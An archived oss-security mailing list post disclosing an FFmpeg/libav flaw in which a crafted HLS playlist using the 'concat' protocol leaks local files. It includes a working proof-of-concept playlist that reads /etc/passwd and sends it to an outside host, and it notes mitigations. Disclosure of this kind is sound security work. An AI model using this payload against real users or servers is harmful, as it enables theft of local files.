Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 13 Jan 2016 14:01:55 +0300
From: Vladimir Dubrovin <vlad@...urityvulns.ru>
To: oss-security@...ts.openwall.com
Subject: Fwd: FFmpeg: stealing local files with HLS+concat


---------- Forwarded message ----------
From: Максим Андреев <andreevmaxim@...il.com>
Date: 13 January 2016 at 13:41
Subject: FFmpeg: stealing local files with HLS+concat
To: oss-security@...ts.openwall.com


Hello!
I found some strange behavior in ffmpeg which can lead to stealing local
files during ffmpeg/ffprobe exec, it's also applied to libav.

I've underestimated the impact of this bug, so it was full disclosured
in this article (Russian language, but google translate works fine with
it) - http://habrahabr.ru/company/mailru/blog/274855


In short:
if linux user download specially prepared video file (with any
extension: avi/mov/etc..) which contains HLS m3u8 playlist with "concat"
protocol in url:,
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://dx.su/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

header.m3u8:
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://example.org?

If user launches ffmpeg-based video player (MPlayer, etc..), first line
of /etc/passwd will be sent to http://example.org? in
http://example.org?# $FreeBSD: release/100.0/et..  request.
The same happens when file manager tries to generate thumbnail for this
file.

All this can be applied to server-run ffmpeg during video conversion.
FFmpeg/libav security teams are already notified, but official patches
are not available yet, so you can rebuild ffmpeg with --disable-network
configure option which prevents this vulnerability from being exploited.

Moreover, it's always recommended to run ffmpeg in isolated environment
when processing untrusted files
(googleonlinesecurity.blogspot.ru/2014/01/ffmpeg-and-thousand-fixes.html)

-- 
Maxim Andreev



Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ